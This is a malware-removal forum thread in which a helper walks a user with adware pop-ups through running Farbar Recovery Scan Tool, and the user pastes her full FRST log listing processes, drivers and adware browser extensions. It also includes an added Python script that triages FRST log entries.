contending with contant pop-ups, and interference whilst using the internet


  • This topic is locked
20 replies to this topic

#1 Paulie67

Paulie67

  • Members
  • 12 posts
  • Gender:Female
  • Location:Sunshine Coast, QLD

Posted 16 March 2014 - 10:37 PM

Hi, I have run AdwCleaner by Xplode and copied and pasted the report, followed by Junkware Removal, then also copied and pasted, saving the report... still having problems??

uuurgghhhh...

 

would ComboFix be the next consideration??




#2 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • Gender:Male
  • Location:Puerto Rico

Posted 17 March 2014 - 07:20 AM

Hello Paulie67

I would like to welcome you to the Malware Removal section of the forum.

Around here they call me Gringo and I will be glad to help you with your malware problems.

Very Important --> Please read this post completely. I have spent my time putting together some things for you to keep in mind while I am helping you, to make things go easier, faster and smoother for both of us!

  • Please do not run any tools unless instructed to do so.
    • We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
  • Please do not attach logs or use code boxes, just copy and paste the text.
    • Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.
  • Please read every post completely before doing anything.
    • Pay special attention to the NOTE: lines; these entries identify an individual issue or important step in the cleanup process.
  • Please provide feedback about your experience as we go.
    • A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", as this requires the extra step of looking back at your previous post.
NOTE: At the top of your post, click on the "Follow This Topic" button, make sure that the "Receive notification" box is checked and that it is set to "Instantly". This will send you an e-mail as soon as I reply to your topic, allowing us to resolve the issue faster.

NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartache if things don't go as planned. You can put them on a CD/DVD, external drive or a pen drive, anywhere except on the computer.

NOTE: It is good practice to copy and paste the instructions into notepad and print them in case it is necessary for you to go offline during the cleanup process. To open notepad, navigate to Start Menu > All Programs > Accessories > Notepad. Please remember to copy the entire post so you do not miss any instructions.

I would like you to run this program for me.

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run from. Please copy and paste it into your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.
Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here. Don't worry, every little bit helps.

Proud Graduate Of Malware Removal University
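As an added example (it is not code from this thread, nor part of FRST itself), here is a small Python script that triages the Registry and Internet sections of the FRST.txt log the instructions above ask for. It flags the `<======= ATTENTION` markers FRST adds, BHO and toolbar entries whose target file is gone (`No File`, the usual leftover of removed adware), and browser extensions registered machine-wide through HKLM keys rather than installed by the user. The rule names, the function names and the `SAMPLE_LOG` text (constructed, modelled on the report posted later in this thread, with the user name replaced) are the example's own assumptions. The output is a review list for the helper, not a malware verdict: legitimate products such as avast! register their browser extensions through HKLM in exactly the same way.

```python
import re
from collections import Counter

# Constructed sample input, modelled on the layout of a FRST.txt report
# (paths shortened, user name replaced). Not a real scan result.
SAMPLE_LOG = r"""
==================== Registry (Whitelisted) ==================

HKLM-x32\...\Run: [AvastUI.exe] - C:\Program Files\AVAST Software\Avast\AvastUI.exe [3767096 2014-03-16] (AVAST Software)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION

==================== Internet (Whitelisted) ====================

BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
BHO-x32: Bizzybolt - {13070af0-bc6c-4185-8baa-40a4cf05b323} -  No File
BHO-x32: Media Player - {497c088e-1b2a-43fe-8431-d5d257f37546} -  No File
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
FF Extension: deeal4meu - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\abc.default\Extensions\kf@hprqfobf.co.uk [2014-02-15]
FF HKLM-x32\...\Firefox\Extensions: [ext@MediaViewV1alpha5390.net] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha5390\ff
CHR HKLM-x32\...\Chrome\Extension: [anapdnpmolnfpoanicpbhbkjdanalhli] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha5390\ch\MediaViewV1alpha5390.crx [2014-02-27]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-03-16]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
"""

# Rule names are this example's own choice, not FRST terminology.
RULES = [
    # FRST appends this suffix to entries it wants the helper to look at.
    ("attention", re.compile(r"<=+ ATTENTION\s*$")),
    # Registry entries whose target file no longer exists on disk.
    ("orphaned_entry",
     re.compile(r"^(BHO|BHO-x32|Toolbar|FF Plugin(-x32)?): .*-\s+No File\s*$")),
    # Browser extensions registered for every user through HKLM keys.
    ("policy_installed_extension",
     re.compile(r"^(FF|CHR) HKLM(-x32)?\\\.\.\.\\(Firefox\\Extensions|Chrome\\Extension): "
                r"\[(?P<ext_id>[^\]]+)\]")),
]


def triage_frst(log_text):
    """Return a list of (category, line) findings for a FRST log.

    Section headers and blank lines are skipped. A line that triggers
    more than one rule is reported once per rule.
    """
    findings = []
    for raw in log_text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("===="):
            continue
        for category, pattern in RULES:
            if pattern.search(line):
                findings.append((category, line))
    return findings


def summarize(findings):
    """Count findings per category so the helper can see the shape of the log at a glance."""
    return Counter(category for category, _ in findings)


def policy_extension_ids(log_text):
    """Identifiers of HKLM-registered extensions, in log order, for follow-up research."""
    pattern = dict(RULES)["policy_installed_extension"]
    ids = []
    for line in log_text.splitlines():
        match = pattern.search(line)
        if match:
            ids.append(match.group("ext_id"))
    return ids


if __name__ == "__main__":
    results = triage_frst(SAMPLE_LOG)
    for category, line in results:
        print(f"[{category}] {line}")
    print(dict(summarize(results)))
    print("HKLM extensions to research:", policy_extension_ids(SAMPLE_LOG))
```

To use it on a real log, read FRST.txt into a string and pass it to `triage_frst` in place of `SAMPLE_LOG`; the three rules are deliberately narrow so that the helper still reads the whole report rather than trusting the script.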

#3 Paulie67

Paulie67
  • Topic Starter

  • Members
  • 12 posts
  • Gender:Female
  • Location:Sunshine Coast, QLD

Posted 18 March 2014 - 09:45 AM

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-03-2014
Ran by Paulette (administrator) on PAULETTE-PC on 19-03-2014 00:41:22
Running from C:\Users\Paulette\Desktop
Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
(AMD) C:\Windows\system32\atiesrxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AMD) C:\Windows\system32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe
(ABBYY) C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
(Hewlett-Packard Company) c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(AVG) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
(AVG) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgui.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems, Inc.) C:\Windows\SysWow64\Macromed\Flash\FlashUtil10c.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe

==================== Registry (Whitelisted) ==================

HKLM-x32\...\Run: [StartCCC] - C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2009-09-08] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [] - [X]
HKLM-x32\...\Run: [AVG_UI] - C:\Program Files (x86)\AVG\AVG2014\avgui.exe [4956176 2013-11-07] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [APSDaemon] - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [EEventManager] - C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [976320 2009-12-03] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [AvastUI.exe] - C:\Program Files\AVAST Software\Avast\AvastUI.exe [3767096 2014-03-16] (AVAST Software)
HKU\.DEFAULT\...\RunOnce: [SPReview] - C:\Windows\System32\SPReview\SPReview.exe [301568 2014-01-26] (Microsoft Corporation)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.jp.msn.com/CQALL/13
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.jp.msn.com/CQALL/13
HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages =
StartMenuInternet: IEXPLORE.EXE - c:\program files (x86)\internet explorer\iexplore.exe
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
BHO-x32: Bizzybolt - {13070af0-bc6c-4185-8baa-40a4cf05b323} -  No File
BHO-x32: Media Player - {497c088e-1b2a-43fe-8431-d5d257f37546} -  No File
BHO-x32: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Bing Bar Helper - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
Toolbar: HKLM - avast! Online Security - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - avast! Online Security - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default
FF NewTab: hxxp://www.google.com/firefox
FF SearchEngineOrder.1: Google
FF SelectedSearchEngine: Google
FF Homepage: hxxp://www.google.com/firefox
FF Keyword.URL: hxxp://www.google.com/search?ie=UTF-8&oe=utf-8&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_12_0_0_77.dll ()
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_77.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\SysWOW64\Adobe\Director\np32dsw_1207148.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: deeal4meu - C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\Extensions\kf@hprqfobf.co.uk [2014-02-15]
FF Extension: PsdChheckeer - C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\Extensions\pcuoiu@ho-eqn.co.uk [2014-02-15]
FF Extension: Address Bar Search - C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\Extensions\{badea1ae-72ed-4f6a-8c37-4db9a4ac7bc9}.xpi [2014-01-26]
FF HKLM-x32\...\Firefox\Extensions: [ext@MediaPlayerV1alpha8359.net] - C:\Program Files (x86)\MediaPlayerV1\MediaPlayerV1alpha8359\ff
FF HKLM-x32\...\Firefox\Extensions: [ext@MediaViewerV1alpha1544.net] - C:\Program Files (x86)\MediaViewerV1\MediaViewerV1alpha1544\ff
FF Extension: Media Viewer - C:\Program Files (x86)\MediaViewerV1\MediaViewerV1alpha1544\ff [2014-02-25]
FF HKLM-x32\...\Firefox\Extensions: [ext@MediaViewV1alpha1750.net] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha1750\ff
FF Extension: Media View - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha1750\ff [2014-02-28]
FF HKLM-x32\...\Firefox\Extensions: [ext@MediaViewV1alpha5390.net] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha5390\ff
FF Extension: Media View - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha5390\ff [2014-03-16]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-03-16]

Chrome:
=======
CHR RestoreOnStartup: "hxxp://www.google.com/"
CHR DefaultSearchKeyword: google.com.au
CHR Extension: (Google Docs) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-01-20]
CHR Extension: (Google Drive) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-01-20]
CHR Extension: (YouTube) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-01-20]
CHR Extension: (Google Search) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-01-20]
CHR Extension: (No Name) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkcefkcdkepgkpbgncjchhbjgoanleod [2014-01-20]
CHR Extension: (Google Wallet) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-20]
CHR Extension: (Gmail) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-01-20]
CHR HKLM-x32\...\Chrome\Extension: [anapdnpmolnfpoanicpbhbkjdanalhli] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha5390\ch\MediaViewV1alpha5390.crx [2014-02-27]
CHR HKLM-x32\...\Chrome\Extension: [fgbdmiloaeojcpapinhpkaofnhakoeef] - C:\Program Files (x86)\MediaViewerV1\MediaViewerV1alpha1544\ch\MediaViewerV1alpha1544.crx [2014-02-23]
CHR HKLM-x32\...\Chrome\Extension: [fonpkfofimgikimaalgagbgajpdfciio] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha1750\ch\MediaViewV1alpha1750.crx [2014-02-27]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-03-16]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Services (Whitelisted) =================

R2 ABBYY.Licensing.FineReader.Sprint.9.0; C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [759048 2009-05-14] (ABBYY)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-03-16] (AVAST Software)
R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [113704 2014-03-16] (AVAST Software)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe [3478544 2013-11-11] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe [348008 2013-09-24] (AVG Technologies CZ, s.r.o.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [418376 2013-04-04] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [701512 2013-04-04] (Malwarebytes Corporation)
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [2102072 2013-12-18] (AVG)

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [28184 2014-03-16] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [78648 2014-03-16] (AVAST Software)
R1 aswNdisFlt; C:\Windows\System32\DRIVERS\aswNdisFlt.sys [440672 2014-03-16] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [92544 2014-03-16] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-03-16] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1038072 2014-03-16] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [421704 2014-03-16] (AVAST Software)
R3 aswStm; C:\Windows\system32\drivers\aswStm.sys [80184 2014-03-16] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [207904 2014-03-16] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [150808 2013-11-05] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [240920 2013-11-04] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [194872 2013-10-24] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [212280 2013-10-31] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [294712 2013-10-31] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123704 2013-10-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31544 2013-09-10] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [251192 2013-08-01] (AVG Technologies CZ, s.r.o.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25928 2013-04-04] (Malwarebytes Corporation)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [14112 2013-12-16] (TuneUp Software)
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-03-19 00:41 - 2014-03-19 00:42 - 00015656 _____ () C:\Users\Paulette\Desktop\FRST.txt
2014-03-19 00:41 - 2014-03-19 00:41 - 00000000 ____D () C:\FRST
2014-03-19 00:39 - 2014-03-19 00:40 - 02157056 _____ (Farbar) C:\Users\Paulette\Desktop\FRST64.exe
2014-03-19 00:37 - 2014-03-19 00:37 - 01145856 _____ (Farbar) C:\Users\Paulette\Desktop\FRST.exe
2014-03-17 13:21 - 2014-03-17 13:21 - 00001984 _____ () C:\Users\Paulette\Desktop\JRT.txt
2014-03-17 13:09 - 2014-03-17 13:09 - 00000000 ____D () C:\Windows\ERUNT
2014-03-17 13:02 - 2014-03-17 13:02 - 01037734 _____ (Thisisu) C:\Users\Paulette\Downloads\JRT.exe
2014-03-17 12:39 - 2014-03-17 12:43 - 00000000 ____D () C:\AdwCleaner
2014-03-17 12:37 - 2014-03-17 12:39 - 01950720 _____ () C:\Users\Paulette\Downloads\AdwCleaner.exe
2014-03-17 11:40 - 2014-03-19 00:22 - 00000224 _____ () C:\Windows\setupact.log
2014-03-17 11:40 - 2014-03-17 11:40 - 00028918 _____ () C:\Windows\PFRO.log
2014-03-17 11:40 - 2014-03-17 11:40 - 00000000 _____ () C:\Windows\setuperr.log
2014-03-17 11:13 - 2014-03-17 11:40 - 00000470 _____ () C:\Windows\Tasks\SparkTrust Registration3.job
2014-03-17 11:13 - 2014-03-17 11:13 - 00003140 _____ () C:\Windows\System32\Tasks\SparkTrust Registration3
2014-03-17 11:12 - 2014-03-19 00:23 - 00000480 _____ () C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job
2014-03-17 11:12 - 2014-03-17 11:40 - 00000651 _____ () C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job
2014-03-17 11:12 - 2014-03-17 11:40 - 00000428 _____ () C:\Windows\Tasks\SparkTrust Update Version3.job
2014-03-17 11:12 - 2014-03-17 11:12 - 00004096 _____ () C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E
2014-03-17 11:12 - 2014-03-17 11:12 - 00003248 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3
2014-03-17 11:12 - 2014-03-17 11:12 - 00002912 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task
2014-03-16 15:22 - 2014-03-17 13:25 - 00002192 _____ () C:\Users\Public\Desktop\avast! Premier.lnk
2014-03-16 15:22 - 2014-03-16 15:22 - 00440672 _____ (AVAST Software) C:\Windows\system32\Drivers\aswndisflt.sys
2014-03-16 15:22 - 2014-03-16 15:22 - 00002018 _____ () C:\Users\Public\Desktop\avast! SafeZone.lnk
2014-03-16 15:21 - 2014-03-18 23:32 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-03-16 15:19 - 2014-03-16 15:19 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\AVAST Software
2014-03-16 09:06 - 2014-03-16 09:06 - 01038072 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00421704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00334136 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-03-16 09:06 - 2014-03-16 09:06 - 00207904 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00092544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00080184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00078648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-03-16 09:06 - 2014-03-16 09:06 - 00028184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2014-03-16 09:05 - 2014-03-16 09:05 - 00000000 ____D () C:\Program Files\AVAST Software
2014-03-16 09:02 - 2014-03-16 09:02 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-03-16 08:49 - 2014-03-16 08:59 - 123721288 _____ (AVAST Software) C:\Users\Paulette\Downloads\avast_premier_antivirus_setup.exe
2014-03-16 08:49 - 2014-03-16 08:49 - 00001727 _____ () C:\Users\Paulette\Downloads\License(1).avastlic
2014-03-13 09:03 - 2014-03-01 16:05 - 23133696 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-03-13 09:03 - 2014-03-01 15:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-03-13 09:03 - 2014-03-01 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-03-13 09:03 - 2014-03-01 14:58 - 02765824 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
